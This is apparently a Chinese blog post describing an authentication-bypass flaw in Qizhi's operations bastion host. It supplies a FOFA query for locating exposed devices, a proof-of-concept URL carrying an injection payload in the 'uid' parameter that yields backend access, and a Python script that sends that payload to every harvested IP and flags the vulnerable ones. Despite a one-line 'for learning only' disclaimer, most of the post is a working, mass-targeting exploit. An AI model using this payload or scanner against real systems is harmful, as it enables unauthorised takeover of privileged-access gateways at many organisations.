齊治堡壘機任意使用者登入漏洞
阿新 • • 發佈:2021-04-28
宣告:僅供漏洞檢測和學習,勿用於非法測試
漏洞資訊
浙江齊治科技股份有限公司是一家主要經營計算機軟硬體、網路產品的技術開發等專案的公司,近日,HW期間情報齊治運維堡壘機服務端存在任意使用者登入系統漏洞,訪問特定的Url即可獲得後臺許可權。漏洞情報洩露時間:2021-04-10 23:03:05
fofa查詢語法
app=“齊治科技-堡壘機”
POC
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
批量檢測指令碼
可以先用fofa批量獲取ip -》批量爬取fofa查詢的目標ip地址
from requests.packages import urllib3 urllib3.disable_warnings() import requests from colorama import init init(autoreset=True) headers = { 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280', } for url in open("./app=齊治科技-堡壘機.txt",'r'): #讀取出來的資料預設加了換行符,這裡要去掉 url = url.strip("\n") vu_url = url + "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm" try: re = requests.get(url=vu_url,headers=headers,verify=False,timeout=10,proxies={'https':'127.0.0.1:7890'}) if "您尚未登入或者您的會話已超時,請 重新登入系統" in re.text: print(f"{url}漏洞不存在") elif "錯誤的id" in re.text: print(f"\033[0;32m{vu_url}漏洞存在\033[0m") except: print(f"{url}無響應") print('ok')